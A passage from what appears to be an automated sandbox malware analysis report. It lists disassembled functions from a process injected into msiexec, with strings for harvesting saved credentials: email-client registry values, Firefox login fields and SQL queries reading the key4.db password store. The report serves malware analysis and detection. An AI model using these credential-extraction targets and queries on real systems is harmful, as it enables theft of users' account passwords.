                                                              • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                              • API String ID: 1714764973-479759155
                                                              • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                              • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                              • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                              • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                              Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040EBD8
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                              • memset.MSVCRT ref: 0040EC2B
                                                              • memset.MSVCRT ref: 0040EC47
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                              • memset.MSVCRT ref: 0040ECDD
                                                              • memset.MSVCRT ref: 0040ECF2
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                              • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                              • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                              • memset.MSVCRT ref: 0040EDE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                              • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                              • API String ID: 3137614212-1455797042
                                                              • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                              • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                              • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                              • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                              Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                              • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                              • API String ID: 2814039832-2206097438
                                                              • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                              • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                              • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                              • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                              Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                              • memset.MSVCRT ref: 0040E5B8
                                                              • memset.MSVCRT ref: 0040E5CD
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                              • memset.MSVCRT ref: 0040E6B5
                                                              • memset.MSVCRT ref: 0040E6CC
                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                              • memset.MSVCRT ref: 0040E736
                                                              • memset.MSVCRT ref: 0040E74F
                                                              • sprintf.MSVCRT ref: 0040E76D
                                                              • sprintf.MSVCRT ref: 0040E788
                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                              • memset.MSVCRT ref: 0040E858
                                                              • sprintf.MSVCRT ref: 0040E873
                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                              • API String ID: 4171719235-3943159138
                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                              Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                              • GetDC.USER32 ref: 004104E2
                                                              • strlen.MSVCRT ref: 00410522
                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                              • sprintf.MSVCRT ref: 00410640
                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                              Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,67E97B60,?,00000000), ref: 00402533
                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$QueryValuememset
                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 168965057-606283353
                                                              • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                              • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                              Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00402869
                                                                • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                              • _mbscpy.MSVCRT(?,?,67E97B60,?,00000000), ref: 004028A3
                                                                • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67E97B60,?,00000000), ref: 0040297B
                                                                • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                              • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                              • API String ID: 1497257669-167382505
                                                              • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                              • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                              • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                              • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                              Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndDialog.USER32(?,?), ref: 0040FC88
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                              • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                              • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                              • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                              • memset.MSVCRT ref: 0040FCFD
                                                              • memset.MSVCRT ref: 0040FD1D
                                                              • memset.MSVCRT ref: 0040FD3B
                                                              • memset.MSVCRT ref: 0040FD54
                                                              • memset.MSVCRT ref: 0040FD72
                                                              • memset.MSVCRT ref: 0040FD8B
                                                              • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                              • memset.MSVCRT ref: 0040FE45
                                                              • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                              • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                              • sprintf.MSVCRT ref: 0040FF0F
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                              • SetFocus.USER32(00000000), ref: 0040FF39
                                                              Strings
                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                              • {Unknown}, xrefs: 0040FD02
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                              • API String ID: 1428123949-3474136107
                                                              • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                              • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                              • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                              • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                              Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                              • memset.MSVCRT ref: 0040128E
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                              • String ID:
                                                              • API String ID: 2998058495-0
                                                              • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                              • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                              Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                              • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                              • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                              • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                              • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                              • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                              • _strcmpi.MSVCRT ref: 0040BE93
                                                              • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                              • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                              • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                              • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                              • strlen.MSVCRT ref: 0040BEFE
                                                              • strlen.MSVCRT ref: 0040BF0C
                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                              • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                              • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                              • memset.MSVCRT ref: 0040BFDB
                                                              • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                              • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                              • API String ID: 2303586283-933021314
                                                              • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                              • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                                              • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                                              • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                                              Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                              • API String ID: 231171946-2189169393
                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                              Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 633282248-1996832678
                                                              • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                              • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                              Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00406782
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                              • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                              • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                              • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                              • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                              • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                              • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                              • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                              • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                              • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                              Strings
                                                              • , xrefs: 00406834
                                                              • key4.db, xrefs: 00406756
                                                              • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                              • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$memsetstrlen
                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                              • API String ID: 3614188050-3983245814
                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                              Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A973
                                                              • memset.MSVCRT ref: 0040A996
                                                              • memset.MSVCRT ref: 0040A9AC
